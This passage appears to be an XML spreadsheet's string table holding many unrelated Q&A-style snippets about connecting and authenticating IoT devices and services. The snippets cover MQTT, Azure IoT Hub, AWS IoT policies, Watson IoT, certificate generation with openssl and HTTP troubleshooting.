client.on_message = on_message
client.username_pw_set("user", "mypassword") 
client.connect("m14.cloudmqtt.com", 21543, 50) 
client.loop_forever()</t>
  </si>
  <si>
    <t>Documentation for connecting devices can be found below:-
https://console.bluemix.net/docs/services/IoT/reference/security/connect_devices_apps_gw.html#connect_devices_apps_gw
https://console.bluemix.net/docs/services/IoT/iotplatform_task.html#iotplatform_task
hostname is the messaging url in the form of  'orgId.messaging.internetofthings.ibmcloud.com' where orgId is the name of your organisation.</t>
  </si>
  <si>
    <t>Here's the logs for the traefik container after deploying portainer:
time="2019-02-19T11:32:52Z" level=error msg="Unable to obtain ACME certificate for domains \"portainer.com\" detected thanks to rule \"Host:portainer.com\" : unable to generate a certificate for the domains [portainer.com]: acme: Error -&gt; One or more domains had a problem:\n[portainer.com] acme: error: 403 :: urn:ietf:params:acme:error:unauthorized :: Invalid response from http://portainer.com/.well-known/acme-challenge/eDN0Z2VJRzuZm9wiAbar1BOVHLPJ5qPYKBpwfuJOtdY: \"&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;meta charset=\\\"utf-8\\\"&gt;&lt;meta http-equiv=\\\"x-ua-compatible\\\" content=\\\"ie=edge\\\"&gt;&lt;meta name=\\\"viewport\\\" cont\", url: \n"
time="2019-02-19T11:33:15Z" level=error msg="Unable to obtain ACME certificate for domains \"portainer.com\" detected thanks to rule \"Host:portainer.com\" : unable to generate a certificate for the domains [portainer.com]: acme: Error -&gt; One or more domains had a problem:\n[portainer.com] acme: error: 403 :: urn:ietf:params:acme:error:unauthorized :: Invalid response from http://portainer.com/.well-known/acme-challenge/Of6CWm4zvCdPo0BFPTxapEVXPU-qf7hhl1f6NCUTmQw: \"&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;meta charset=\\\"utf-8\\\"&gt;&lt;meta http-equiv=\\\"x-ua-compatible\\\" content=\\\"ie=edge\\\"&gt;&lt;meta name=\\\"viewport\\\" cont\", url: \n"
Am I missing something?</t>
  </si>
  <si>
    <t>To remedy this, you can set the hostname and bypass the auto detection like so:
If you are interested in using IoT Edge as a gateway, there is more information here: https://docs.microsoft.com/en-us/azure/iot-edge/how-to-create-transparent-gateway</t>
  </si>
  <si>
    <t>Features
Stubbing HTTP requests at low http client lib level (no need to change tests when you change HTTP library)
Setting and verifying expectations on HTTP requests
Matching requests based on method, URI, headers and body
Smart matching of the same URIs in different representations (also encoded and non encoded forms)
Smart matching of the same headers in different representations.</t>
  </si>
  <si>
    <t>This webhook will be sent a POST message containing a header with a valid auth token (that you issued) and a JSON body.</t>
  </si>
  <si>
    <t>Since the trigger message from the server contains no actual payload (arrival of the message itself is enough payload) an attacker could not modify or fake the message to create insecure behavior in the client.</t>
  </si>
  <si>
    <t>When I first register a device with DPS and send telemetry message, it works successfully, after some time or maybe after some days, when I send the same message again with or without re-registration, that message became orphaned as my event hub not getting that message and hence my function is not triggered.</t>
  </si>
  <si>
    <t>2018-11-08 15:11:44.913 +00:00 [INF] - Successfully generated identity for clientId myEdgeDevice/IoTEdgeJob and username {username}/myEdgeDevice/IoTEdgeJob/?api-version=2018-06-30&amp;DeviceClientType=Microsoft.Azure.Devices.Client%2F1.18.1%20%28.NET%20Core%204.6.26515.07%3B%20Linux%204.9.93-linuxkit-aufs%20%231%20SMP%20Wed%20Jun%206%2016%3A55%3A56%20UTC%202018%3B%20X64%29%20Microsoft.stream-analytics-on-iot-edge
2018-11-08 15:11:44.916 +00:00 [INF] - ClientAuthenticated, myEdgeDevice/IoTEdgeJob, 305bf5b5
2018-11-08 15:11:44.916 +00:00 [INF] - New device connection for device myEdgeDevice/IoTEdgeJob
2018-11-08 15:11:44.917 +00:00 [WRN] - Closing connection for device: myEdgeDevice/IoTEdgeJob, Microsoft.Azure.Devices.Edge.Hub.Core.MultipleConnectionsException: Multiple connections detected for device myEdgeDevice/IoTEdgeJob,
2018-11-08 15:11:44.917 +00:00 [INF] - Disposing MessagingServiceClient for device Id myEdgeDevice/IoTEdgeJob because of exception - Microsoft.Azure.Devices.Edge.Hub.Core.MultipleConnectionsException: Multiple connections detected for device myEdgeDevice/IoTEdgeJob
2018-11-08 15:11:44.917 +00:00 [INF] - Closing device proxy for device Id myEdgeDevice/IoTEdgeJob
2018-11-08 15:11:44.917 +00:00 [INF] - Bind device proxy for device myEdgeDevice/IoTEdgeJob
2018-11-08 15:11:44.917 +00:00 [INF] - Binding message channel for device Id myEdgeDevice/IoTEdgeJob
2018-11-08 15:11:44.926 +00:00 [INF] - Processing subscription TwinResponse for client myEdgeDevice/IoTEdgeJob.</t>
  </si>
  <si>
    <t>While using Azure IoT Edge as a transparent gateway, can downstream devices authenticate using SAS tokens using the Shared Access Policy keys?</t>
  </si>
  <si>
    <t>From http://docs.aws.amazon.com/iot/latest/developerguide/protocols.html
The message broker uses the client ID to identify each client.</t>
  </si>
  <si>
    <t>You need to generate your SSH keys (like @Ajedi32 exlains) or like is explained on github page : https://help.github.com/articles/generating-ssh-keys
Also currently if you type
you will see that your repository (origin probably) will have pathes starting with https://github.com/user/repo.git).</t>
  </si>
  <si>
    <t>My problem ended up being that I was trying to set a really large expiration date on my Json Web Token (on purpose so I didnt have to keep generating new ones since I have not found a way to do that in arduino) and it looks like that google's mqtt server does not accept anything over a day so the keys will have to be updated daily.</t>
  </si>
  <si>
    <t>AWS IoT uses mutual authentication not just client authentication to establish trust: http://docs.aws.amazon.com/iot/latest/developerguide/managing-device-certs.html
You will need to do two things 1) Identify in the iOS SDK where the AWS IoT server CA is set (https://www.symantec.com/content/en/us/enterprise/verisign/roots/VeriSign-Class%203-Public-Primary-Certification-Authority-G5.pem) and replace it with the CA for your RabbitMQ Broker, 2) Configure RabbitMQ for mutual authentication (if supported).</t>
  </si>
  <si>
    <t>I am writing a service for device provisioning on Azure IoT hub, So I came across Azure Device provisioning service which include TPM, X.509 certificate and symmetric key based provisioning mechanism.</t>
  </si>
  <si>
    <t>Now lets come to the error -
To successfully connect to mqtt with authenticated Cognito credentials, you need 2 correct policies -
Authenticated role corresponding to your identity pool should allow all mqtt operations.</t>
  </si>
  <si>
    <t>console.log('ATTACH PRINCIPAL POLICY ERROR', err) : console.log('ATTACH PRINCIPAL POLICY SUCCESS');
    });
  }
Now, when the identity tries to connect with IOT, IOT will find a IOT policy attached to this identity, and approve this connection.</t>
  </si>
  <si>
    <t>A transparent proxy is a service that makes a request on behalf of a client, without changing the request itself, and passes the resulting response unaltered back to the client.</t>
  </si>
  <si>
    <t># Create instance of a Dropbox class, which can make requests to API
    print("Creating a Dropbox object...")
    dbx = dropbox.Dropbox(TOKEN)
    # Check that the access token is valid
    try:
        dbx.users_get_current_account()
    except AuthError as err:
        sys.exit("ERROR: Invalid access token; try re-generating an "
                 "access token from the app console at dropbox.com.")</t>
  </si>
  <si>
    <t>Try
   httpResponse := '';
   HTTP := TidHTTP.Create(Application);
   with HTTP do
   begin
    IOHandler := TIdSSLIOHandlerSocketOpenSSL.Create(Nil);
    Request.CustomHeaders.FoldLines := False;
    Request.CustomHeaders.AddValue('authorization', 'Bearer '+jwt);
    //Request.CustomHeaders.AddValue('content-type', 'application/json');
    Request.CustomHeaders.AddValue('cache-control', 'no-cache');
    httpResponse := Get(sURL);
   end;
  except
    on E: Exception do
      ShowMessage(E.Message);
  end;
 Finally
   Memo.Lines.Add(httpResponse);
 End;</t>
  </si>
  <si>
    <t>I created policies in IAM and they were not recognised - you actually need to create the IoT policy as described above by Roshan within the context of IoT Core Security and specify the name that you give it within the PubSub sample code.</t>
  </si>
  <si>
    <t>You can setup the HTTP message content for device registration as follows:
httpRequest.Content = new StringContent("{\"registrationId\": \"device1\"}", Encoding.UTF8);
httpRequest.Content.Headers.ContentType=MediaTypeHeaderValue.Parse("application/json; charset=utf-8");
Note that the JSON content does NOT include "type" : "x509".</t>
  </si>
  <si>
    <t>I don't have a need for authenticating the clients before provisioning, I just want each client to be able to communicate securely with the IoT hub.</t>
  </si>
  <si>
    <t>Under normal circumstances messages will only be delivered if the subscribing client is connected and subscribing before the message is published.</t>
  </si>
  <si>
    <t>The client ID is passed in from the client to the message broker as part of the MQTT payload.</t>
  </si>
  <si>
    <t>HTTP proxy)
HTTPS Tunneling Proxying (using HTTP CONNECT)
SOCKS Proxying (i.e.</t>
  </si>
  <si>
    <t>Have generated API key in Watson iot and put it in the POST header e.g:
username: a-XYXYX-bvbcxgmz6d
password: XYXYX+6QY6OKw*J
Content-Type: application/json
I then send this POST to changed my real orgId in this post:
http://orgId.messaging.internetofthings.ibmcloud.com:1883/api/v0002/application/types/ecu/devices/ecu1/events/test
But I keep ending up in server response 403 Not allowed.</t>
  </si>
  <si>
    <t>These abstractions make it easy to perform a variety of network tasks, such as:
Working with BSD sockets
Creating encrypted connections using SSL or TLS
Resolving DNS hosts
Working with HTTP, authenticating HTTP and HTTPS servers
Working with FTP servers
Publishing, resolving and browsing Bonjour services</t>
  </si>
  <si>
    <t>I removed the logging statements for readability:
The exception thrown is:
Internal.Cryptography.CryptoThrowHelper+WindowsCryptographicException: Access is denied
     at Internal.Cryptography.Pal.StorePal.Add(ICertificatePal certificate)
     at System.Security.Cryptography.X509Certificates.X509Store.Add(X509Certificate2 certificate)
     at Microsoft.Azure.Devices.Provisioning.Client.CertificateInstaller.EnsureChainIsInstalled(X509Certificate2Collection certificates)
     at Microsoft.Azure.Devices.Provisioning.Client.ProvisioningDeviceClient.Create(String globalDeviceEndpoint, String idScope, SecurityProvider securityProvider, ProvisioningTransportHandler transport)
I've gone so far as taking the exact same certificate that fails in the hosted app and running it using a local instance of the same app.</t>
  </si>
  <si>
    <t>openssl req -new -sha256 -key rootCA.key -nodes -out rootCA.csr -config rootCA_openssl.conf
openssl x509 -req -days 3650 -extfile rootCA_openssl.conf -extensions v3_ca -in rootCA.csr -signkey rootCA.key -out rootCA.pem 
Now we have CA's certificate, rootCA.pem.</t>
  </si>
  <si>
    <t>When i try with Postman the POST is quite similar:
POST /newLog HTTP/1.1
Host: localhost:8002
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Postman-Token: 79566598-b1b9-de1b-4bf9-e53d38edb232
count=5&amp;device=0
And the server does receive the data:
-------------------------------------------------------
INFO in app [app.py:96]:
fue un POST
---------------------------------------------------------
---------------------------------------------------------
INFO in app [app.py:97]:
ImmutableMultiDict([('device', u'0'), ('count', u'5')])
---------------------------------------------------------
---------------------------------------------------------
INFO in app [app.py:98]:
ImmutableMultiDict([])
---------------------------------------------------------
---------------------------------------------------------
INFO in app [app.py:99]:
CombinedMultiDict([ImmutableMultiDict([]), ImmutableMultiDict([('device', u'0'), ('count', u'5')])])
---------------------------------------------------------
---------------------------------------------------------
INFO in app [app.py:100]:
---------------------------------------------------------
127.0.0.1 - - [14/Nov/2017 10:31:07] "POST /newLog HTTP/1.1" 200 -
Please help!</t>
  </si>
  <si>
    <t>With redbird its straightforward, check this complete example:
1) Generate a localhost development SSL certificate:
/certs $ openssl genrsa -out dev-key.pem 1024
/certs $ openssl req -new -key dev-key.pem -out dev-csr.pem
// IMPORTANT: Do not forget to fill the field!</t>
  </si>
  <si>
    <t>For generating the SAS token, please see the code at https://github.com/Azure/azure-iot-sdks/blob/master/java/service/iothub-service-sdk/src/main/java/com/microsoft/azure/iot/service/auth/IotHubServiceSasToken.java.</t>
  </si>
  <si>
    <t>I further investigated to find out that the azure IoT sdk (for .net) exposes SharedAccessSignatureBuilder that could help in this regard: 
https://docs.microsoft.com/en-us/dotnet/api/microsoft.azure.devices.common.security.sharedaccesssignaturebuilder?view=azure-dotnet
My questions:
Am I going in the correct direction to solve it, or is there any other way around.</t>
  </si>
  <si>
    <t>If an Accept-Encoding field is present in a request, and if the server cannot send a response which is acceptable according to the Accept-Encoding header, then the server SHOULD send an error response with the 406 (Not Acceptable) status code.</t>
  </si>
  <si>
    <t>If you read this documentation (near the end) : Publish/Subscribe Policy Exemple it's stated that you need 2 policies to make it work with Authenticated Cognito User.</t>
  </si>
  <si>
    <t>Async (EventMachine) HTTP client, with support for:
Asynchronous HTTP API for single &amp; parallel request execution
Keep-Alive and HTTP pipelining support
Auto-follow 3xx redirects with max depth
Automatic gzip &amp; deflate decoding
Streaming response processing
Streaming file uploads
HTTP proxy and SOCKS5 support
Basic Auth &amp; OAuth
Connection-level &amp; Global middleware support
HTTP parser via http_parser.rb
Works wherever EventMachine runs: Rubinius, JRuby, MRI
See also the official homepage.</t>
  </si>
  <si>
    <t>by exchanging the code generated from the Microsoft I am able to get the access token, refresh token and Id token from the cognito token end point.</t>
  </si>
  <si>
    <t>This could be done by creating a node that subscribes to the "sensors" topics and sends the data received to Azure IoT Hub.</t>
  </si>
  <si>
    <t>I'm calling it like this:
(where  and $SIGNATURE are bash variables containing the JWT token and its AWS signature)
And this is the response I'm getting:
An error occurred (InvalidRequestException) when calling the TestInvokeAuthorizer operation: 1 validation error detected: Value '[MY TOKEN IS PRINTED HERE]' at 'token' failed to satisfy constraint: Member must have length less than or equal to 1024
I can see that there is indeed a 1024 character limit on the token field here: https://docs.aws.amazon.com/iot/latest/developerguide/api-com.amazonaws.iot.identity.TestInvokeAuthorizer.html
My access token is 1418 chars, so it's clear that it's surpasses this limit.</t>
  </si>
  <si>
    <t>Thus I restarted my local server like this:
openssl s_server -accept 5454 -key key.pem -cert cert.pem -cipher ECDHE-RSA-AES128-GCM-SHA256 &gt; /dev/null
And BINGO!</t>
  </si>
  <si>
    <t>One such exception is:
Microsoft.Azure.Devices.Client.Exceptions.UnauthorizedException
This exception is just an example of an exception I am getting, and one that I can reliably recreate by changing system time.</t>
  </si>
  <si>
    <t>TL;DR:
Authenticate to azure iot hub in c++ v120 .NET 4.0 (preferred, otherwise 4.5)
Send json-parsed message to iot hub.</t>
  </si>
  <si>
    <t>And this only works when I pass my intermediate cert in device's code (regardless of I choose CA or intermediate certificate in step 2):
This code is from azure's github samples.</t>
  </si>
  <si>
    <t>Related : c# Azure IOT Edge Auto-provision with Device Provisioning Service(DPS) with x509 certificate sample needed</t>
  </si>
  <si>
    <t xml:space="preserve">
Does C2D messaging work in transparent gateway scenario (send C2D
  messages to leaf devices through IoT Hub directly)?</t>
  </si>
  <si>
    <t>Bad gateway refers to http error 502 which is mean that a server which is try to fulfill the client request received an invalid response from upstream server</t>
  </si>
  <si>
    <t>Here is what I do:
Create a private key
Create a CSR with that private key
Sign it using the provided Intermediate certificate
I used openssl for all this and it worked flawlessly: The TLS endpoint accepted my conection request.</t>
  </si>
  <si>
    <t>if I send a message (Cloud 2 Device) via the IoT-Hub:
And try to receive the acknoledgement from the client:
My client gets the message immediatelly and sends an feedback:
DeviceClient deviceClient = DeviceClient.Create(iotHubUri, new DeviceAuthenticationWithRegistrySymmetricKey(bridgeID, deviceKey), TransportType.Amqp);
Message receivedMessage = await deviceClient.ReceiveAsync();
await deviceClient.CompleteAsync(receivedMessage);
It take up to 15 seconds until my Cloud gets the feedback.</t>
  </si>
  <si>
    <t>secret: null, // null so the clients do not have control of the master presentation
        id: '1ea875674b17ca76', // id, obtained from socket.io server
        url: 'revealjs.jit.su:80' // Location of socket.io server
    },
    // Don't forget to add the dependencies
    dependencies: [
        { src: '//cdnjs.cloudflare.com/ajax/libs/socket.io/0.9.10/socket.io.min.js', async: true },
        { src: 'plugin/multiplex/client.js', async: true }
        // other dependencies...
    ]
});
Socket.io server
Server that receives the slideChanged events from the master presentation and broadcasts them out to the connected client presentations.</t>
  </si>
  <si>
    <t>Trying to get my node.js IOT example working but not sure what configuration I need to set to pass to my thingShadow constructor 
This is the sample config I get from the AWS dashboard
However this is the constructor I set based on the sdk readme
{
  keyPath: 'bar-private.pem.key',
  certPath: 'bar-certificate.pem.crt',
  caCert: "root-CA.crt",
  clientId: 'bar'
}
I get the error
events.js:141
      throw er; // Unhandled 'error' event
      ^
Error: unable to get local issuer certificate
    at Error (native)
    at TLSSocket.&lt;anonymous&gt; (_tls_wrap.js:1017:38)
    at emitNone (events.js:67:13)
    at TLSSocket.emit (events.js:166:7)
    at TLSSocket._init.ssl.onclienthello.ssl.oncertcb.TLSSocket._finishInit (_tls_wrap.js:582:8)
    at TLSWrap.ssl.onclienthello.ssl.oncertcb.ssl.onnewsession.ssl.onhandshakedone (_tls_wrap.js:424:38)
What is caCert based on - is that a cert that I have in my local path?</t>
  </si>
  <si>
    <t>It must have some connection to Mono By default not trusting any ssl certificate...
well check thess article out http://www.mono-project.com/docs/faq/security/ https://github.com/restsharp/RestSharp/issues/728
https://github.com/dotnet/roslyn/issues/7422
or
You need to use openssl for analyzing the certificate:</t>
  </si>
  <si>
    <t>sends some trigger message, actual payload does not matter) and the client then retrieves the message using a transport which both protects the message against sniffing and modification and also makes sure that the message actually came from the server (i.e.</t>
  </si>
  <si>
    <t>the formats of the messages used to request security tokens and the
responses to those messages.</t>
  </si>
  <si>
    <t>When I tried this example post from Wikipedia with the "Transfer-Encoding" option as specified in rfc2616
or, with escape characters explicit:
I receive the error from my server: 
HTTP/1.1 411 Length Required
A request of the requested method POST requires a valid Content-length.</t>
  </si>
  <si>
    <t>In the API Key settings, for API Key, I specified the key that I generated from the Watson Iot platform; in API Token, the token that got generated with the API Key; in the server field, I specified org_id.messaging.internetofthings.ibmcloud.com.</t>
  </si>
  <si>
    <t>I have a , I would like to set up a policy that allows authenticated users to publish and subscribe to topics associated with their devices in IoT core.</t>
  </si>
  <si>
    <t>The device class is used to subscribe to and publish messages on MQTT topics for telemetry and messaging purposes.</t>
  </si>
  <si>
    <t>Implementation of this extension is explained in https://medium.com/@ayyoobhamza/authentication-and-authorization-extension-for-mqtt-wso2-message-broker-2495fb2fa56e and https://medium.com/@ayyoobhamza/oauth-authentication-and-authorization-with-mqtt-for-iot-devices-a42019187a05
Implementation of the virtual firealarm can be found in https://github.com/wso2/carbon-device-mgt-plugins/tree/master/components/device-types/virtual-fire-alarm-plugin</t>
  </si>
  <si>
    <t>xNet - a class library for .NET Framework, which includes Classes for work with proxy servers: HTTP, Socks4(a), Socks5, Classes for work with HTTP 1.0/1.1 protocol: keep-alive, gzip, deflate, chunked, SSL, proxies and more, Classes for work with multithreading: a multithreaded bypassing the collection, asynchronous events and more.</t>
  </si>
  <si>
    <t>After that, you can see the following certs in your cert manager:
Then construct you device connection string like following if you ave using local host, don't use machine name, like below:
private const string DeviceConnectionString = "HostName=jierong-iothub.azure-devices.net;DeviceId=jierong-iothub-device;SharedAccessKey=XXXXXXXX;GatewayHostName=localhost";
Modified the app cloned from following:
git clone https://github.com/Azure-Samples/iot-hub-dotnet-simulated-device-client-app.git
I can run the app successfully.</t>
  </si>
  <si>
    <t>I have modified the iothub_client_sample_x509.py sample program from the SDK to use arbitrary X509 certificates (actually created with OpenSSL) to connect to IoT Hub.</t>
  </si>
  <si>
    <t>To connect AWS IoT, I have attached following IAM Role Policy to Cognito_UserPoolAuth_Role;
In addition, I have attached a Principal Policy (with each Cognito Identity of User) to IoT Devicess policies in AWS IoT.</t>
  </si>
  <si>
    <t>You can install it with:
and then in the configuration file in  edit:
cert = /etc/ssl/certs/your_public_cert.crt
key = /etc/ssl/private/your_private_cert.pem
[https]
accept  = 8888 
connect = 127.0.0.1:8080
With this you will be able to access your tomcat through https on port 8888.</t>
  </si>
  <si>
    <t>Change this
for this
function(conn, topic, data)
I have worked previously with mqtt in lua with password protection, and i had to drop it beacuse i wasnt recieving the message content either, however i think mine was due to the amount of messages i was recieving/delivering.</t>
  </si>
  <si>
    <t>Just simple question:
I have created a new Service bus, Event hub and some shared access tokens with all rights, but registering a new device with iothub-explorer fails to 'unauthorized' message in Azure.</t>
  </si>
  <si>
    <t>My connection string is as follows:
HostName={IoTHubName}.azure-devices.net;DeviceId=TC51_EdgeDownStreamDevice01;SharedAccessKey={My-Shared-Access-Key}=GatewayHostName={my-gateway-machine-name-dns-name}.centralus.cloudapp.azure.com
a. I have verified I get a successful verification of the SSL cert using the openssl tool.</t>
  </si>
  <si>
    <t>Client Certificate authentication
ASP.NET controls access to site information by comparing authenticated credentials, or representations of them, to NTFS file system permissions or to an XML file that lists authorized users, authorized roles (groups), or authorized HTTP verbs.</t>
  </si>
  <si>
    <t>The issue is when I am using Node.js to make this same request with
I keep getting a { [Error: Parse Error] bytesParsed: 0, code: 'HPE_INVALID_CONSTANT' } message in node
My socket is also showing
GET / HTTP/1.1
Host: 10.0.0.200:2500
Connection: close
So Idk why the conneciton is closed and I even tried sending a header with connection : keep-alive and that didn't help either</t>
  </si>
  <si>
    <t>With the OAuth 2.0 Playground you can walk through each step of the OAuth 2.0 flow for server-side web applications:
 - Authorizing API scopes
 - Exchanging authorization tokens
 - Refreshing access tokens
 - Sending authorized requests to APIs
At each step the Playground displays the full HTTP requests and responses.</t>
  </si>
  <si>
    <t>@lvanegmond from GITHUB help me in this post:
https://github.com/aspnet/Mvc/issues/5591#issuecomment-264961434
with this solution:
Try putting app.UseCors("CorsPolicy"); before app.UseMvc(); 
From the docs:
  https://docs.microsoft.com/en-us/aspnet/core/security/cors#enabling-cors-with-middleware
To enable CORS for your entire application add the CORS middleware to
  your request pipeline using the UseCors extension method.</t>
  </si>
  <si>
    <t>I am trying to generate a valid SAS token (shared access signatures) to connect to the Azure IoT Hub,  but I keep getting the error  when using the token.</t>
  </si>
  <si>
    <t>My policy document looks like this:
To attach/update the the policy for all my users (not so many) I use a Lambda function to do it:
For my authenticated role in the identity pool, I have the following policy attached to the role:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "iot:AttachPrincipalPolicy",
                "iot:Connect",
                "iot:Publish",
                "iot:Subscribe",
                "iot:Receive",
                "iot:GetThingShadow",
                "iot:UpdateThingShadow",
                "iot:DeleteThingShadow"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}
Hope this helps</t>
  </si>
  <si>
    <t>This is the post request the ESP32 is sending out:
POST / HTTP/1.0
Host: sadasdasd.requestcatcher.com
Connection: close
Accept-Encoding: identity;q=1,chunked;q=0.1,*;q=0
Connection: close
Content-Length: 10
Content-Type: application/x-www-form-urlencoded
User-Agent: ESP32HTTPClient</t>
  </si>
  <si>
    <t>iotedgectl setup --connection-string HostName=jierong-iothub.azure-devices.net;DeviceId=jierong-iotedge-device1;SharedAccessKey=XXXXXXX --edge-hostname localhost --device-ca-cert-file myEdgeDevice-public.pem --device-ca-chain-cert-file myEdgeDevice-all.pem --device-ca-private-key-file myEdgeDevice-private.pem --owner-ca-cert-file RootCA.pem
Then run iotedgectl start to start the runtime, and run docker ps to check everything is good.</t>
  </si>
  <si>
    <t>But get error after attaching:
amqp:unauthorized-access
In attach packet target address is "devices/{device-id}/messages/events"
What's wrong?</t>
  </si>
  <si>
    <t>Far as I know, authentication is derived directly from the iot edge runtime, so not sure why it was specifically trying to authenticate or erroring out...
Unhandled Exception: System.AggregateException: One or more errors
  occurred.</t>
  </si>
  <si>
    <t>The code "works", since my endpoint is called, but the server (Sinatra with Puma web server) complains that the http request is malformed, and it seems from my investigations that its because the client seems to request SSL.</t>
  </si>
  <si>
    <t>I've generated a SAS token, set up the Azure IoT Hub, and I'm pretty sure the HTTP header is right and the authorization line is included with the SAS which I've generated from Azure's IOT hub explorer tool.</t>
  </si>
  <si>
    <t>You can setup your own MQTT server somewhere else (could do it in GCE or GKE with a custom container) and make the hostname whatever you want, and then setup your own broker to take the MQTT payloads and create Pub/Sub messages, or even to act as a forwarding proxy to IoT Core itself I suppose (although security and auth might get a bit odd).</t>
  </si>
  <si>
    <t>I am trying to assign standard gateway role to a gateway device as per docs available 
https://docs.internetofthings.ibmcloud.com/apis/swagger/v0002-beta/security-gateway-beta.html#!/Limited_Gateway/put_authorization_devices_deviceId_roles
But I keep on getting 403 Forbidden error.</t>
  </si>
  <si>
    <t>I followed the instructions to create a transparent gateway and successfully have a leaf device send telemetry to the IoT Hub via the gateway.</t>
  </si>
  <si>
    <t>It triggers a Lambda function when client sends a message to the  topic (Client is sending messages to the terminal1/ using certificate files generated from AWS IoT.).</t>
  </si>
  <si>
    <t>Messages are successfully received at the Azure IOT Hub
Now I want to test my security of these messages and trying to verify these messages in WireShark.</t>
  </si>
  <si>
    <t>I can't really understand the concept of permissions on the Azure IoT Hub even after reading the docs 3 times: https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-devguide-security#iot-hub-permissions
When would I use the service policy and when would I use the device policy?</t>
  </si>
  <si>
    <t>It might look like this:
The first GET request comes in from a client
The server responds with "not authorized" response, embedding in the response a token which is related to (perhaps a hash of) the requesting IP address.</t>
  </si>
  <si>
    <t>For example: 
# Get the registration code for the use below: 
# $ aws iot get-registration-code 
openssl genrsa -out verificationCert.key 2048
openssl req -new -key verificationCert.key -out verificationCert.csr
# Put the registration code in Common Name field
openssl x509 -req -in verificationCert.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out verificationCert.crt -days 500 -sha256</t>
  </si>
  <si>
    <t>The defaults user kapua-broker allows only to connect, publish and subscribe under:
{kapua-sys}/{connection-client-id}/#
You need more permissions to subscribe to other client-id topics.</t>
  </si>
  <si>
    <t>):
const net = require('net');
const fs = require('fs');
const https = require('https');
const config = require('./server-config.json');
//
//  SSL SERVER
//
try {
    const privateKey = fs.readFileSync('/etc/letsencrypt/live/' + config.DNSROUTERNAME + '/privkey.pem', 'utf8');
    const certificate = fs.readFileSync('/etc/letsencrypt/live/' + config.DNSROUTERNAME + '/cert.pem', 'utf8');
    const ca = fs.readFileSync('/etc/letsencrypt/live/' + config.DNSROUTERNAME + '/chain.pem', 'utf8');
    const options = {
        key: privateKey,
        cert: certificate,
        ca: ca
    };  
    //pass in your express app and credentials to create an https server
    let httpsServer = https.createServer(options);
        httpsServer.listen(9031);
}
catch (e) {
    console.log("LETSENCRYPT certificates not found!</t>
  </si>
  <si>
    <t>You can do something like -
aws iot attach-principal-policy --principal us-east-1:1c973d17-98e6-4df6-86bf-d5cedc1fbc0d --policy-name "thingpolicy" --region us-east-1 --profile osfg
You will get the principal ID from identity browser of your identity pool.</t>
  </si>
  <si>
    <t>The 403 or "Forbidden" error message is a HTTP standard response code indicating that the request was legal and understood but the server refuses to respond to the request.</t>
  </si>
  <si>
    <t>A Java library for authenticating HTTP Requests using OAuth
https://github.com/twitter/joauth</t>
  </si>
  <si>
    <t>Features:
Environment variables
Data Import &amp; Export
Basic HTTP authentication
Organize services and requests
Import serialized XML
Query string builder
History of sent requests
HTML response preview
Syntax highlighting 
Set Custom Request Headers
Filter operations and requests 
TabJump, Duplicate request and many more.</t>
  </si>
  <si>
    <t>In postman, I send a post request to:
(my real hub name isn't myHubName)
With the Authorization header with the shared access signature and with the content type header,
With this JSON: {deviceId: "myDeviceId", temperature: "80"}
But I have no response whatsoever from the endpoint (Timeout).</t>
  </si>
  <si>
    <t>I will embedded the general information for registration in the UWP apps, when the process being trigger, it will connect to Azure IoT Hub to retrieve the list of devices, and randomly (not that random too) generate the "devicename" and "devicekey", register the newly generate device with Azure IoT Hub.</t>
  </si>
  <si>
    <t>-u but the tool will accept --username
So, I'm able to run the following commands on the Omega2 and both work for me:
mosquitto_pub \
--host mqtt.googleapis.com \
--port 8883 \
--id ${LONG_REGISTRY}/devices/${DEVICE} \
--username unused \
--pw ${PASSWORD} \
--cafile /roots.pem \
--tls-version tlsv1.2 \
--protocol-version mqttv311 \
--debug \
--qos 1 \
--topic /devices/${DEVICE}/events \
--message "Hello Henry!"</t>
  </si>
  <si>
    <t>But when I try to connect the ESP directly to Watson I receive a "connection refused" message
My configuration parameters are:
WATSON_CLIENT_ID = "d:[ORG]:ESP8266:fv_esp01s_02"
WATSON_BROKER_IP = "[ORG].messaging.internetofthings.ibmcloud.com"
WATSON_USER = "use-token-auth"
WATSON_PWD = b"[TOKEN]"
As I said, in Watson, I had created the defined "TLS Optional" and configured the device.</t>
  </si>
  <si>
    <t>3/12/2019 8:53:11 AM info: iotedged -- Configuring the Device CA certificate using
                     "C:\\ADNM\\IoTEdge\\ssl\\certs\\new-edge-device-full-chain.cert.pem".</t>
  </si>
  <si>
    <t>First you need to set up a cognito identity pool, link the identity pool to your user pool and assign a role(attach IAM policy to this role) to this identity pool.</t>
  </si>
  <si>
    <t>After the last step which is creating a policy in IoT , I would recommend creating a thing and a certificate and attach this policy to that certificate.</t>
  </si>
  <si>
    <t>I want to generate a new SAS token for accessing an Azure IoT Hub using Paho MQTT with Java.</t>
  </si>
  <si>
    <t>?\EddystoneURL.ino.hex}} verify reset; shutdown;
Open On-Chip Debugger 0.10.0-dev-00254-g696fc0a (2016-04-10-10:13)
Licensed under GNU GPL v2
For bug reports, read
        http://openocd.org/doc/doxygen/bugs.html
debug_level: 2
interface_transports transport ...
transport
  transport init
  transport list
  transport select [transport_name]
transport : command requires more arguments
in procedure 'transport'
I have replaced the full path's to the hex files to make it easier to read.</t>
  </si>
  <si>
    <t>In the following link you can find description on the Server's configuration: https://ravendb.net/docs/article-page/4.1/csharp/server/configuration/configuration-options
Modify  in a way it fits your security needs, as follows (Replace 10.0.0.90 with your Pie's IP)
Totally unsecured access from anywhere (ATTENTION: This will give access to the database to any one with access to this docker instance):
Access from docker's host machine or other machines on you local LAN:
{
  "ServerUrl": "http://10.0.0.90:8080",
  "Setup.Mode": "None",
  "PublicServerUrl": "http://10.0.0.90:8080",
  "Security.UnsecuredAccessAllowed": "PrivateNetwork",
  "License.Eula.Accepted": true
}
Browsing to http://10.0.0.90:8080 should work at this point.</t>
  </si>
  <si>
    <t>Steps to Recreate:
From Chrome Tools Console
There is a similar problem on github - https://github.com/ipfs/js-ipfs/issues/270 - which suggests switching crypto to webcrypto
Potential Solution: switch crypto to webcrypto - would require rewriting azure-iot-common/lib/authorization.js
Questions:
Has anyone created a hub device from the browser using node module azure-iot-hub?</t>
  </si>
  <si>
